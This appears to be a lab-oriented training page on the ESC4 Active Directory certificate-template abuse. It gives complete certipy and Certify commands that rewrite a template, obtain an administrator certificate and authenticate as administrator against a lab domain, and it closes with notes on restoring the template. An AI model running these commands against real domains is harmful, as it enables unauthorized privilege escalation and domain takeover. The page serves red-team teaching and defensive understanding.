Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS / Techniques

ESC4

ESC4 abuses write access over a certificate template. We modify the template into an ESC1-style configuration, enroll a privileged certificate, and restore the original template configuration.

Dangerous template rights

Owner
FullControl
WriteProperty
WriteOwner
WriteDacl
GenericWrite
GenericAll

Find ESC4

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout

Write vulnerable default configuration

certipy template -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -template ESC4 -write-default-configuration

Request privileged certificate

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC4 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator

Restore template configuration

certipy template -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -template ESC4 -write-configuration ESC4.json -no-save

Authenticate

certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200

Windows with Certify

Certify.exe manage-template --template ESC4 --supply-subject --client-auth --authorized-signatures 0 --quiet
Certify.exe enum-templates --template ESC4 --quiet
Certify.exe request --ca "dc01.ootw.local\OOTW-CA" --template ESC4 --upn Administrator --quiet

Notes

ESC4 only helps if the template is published by a CA or can be made publishable through another path. Modifying a template that no CA issues does not immediately produce a certificate.

Always save and restore the original configuration during labs. Template changes affect every principal that can enroll from that template.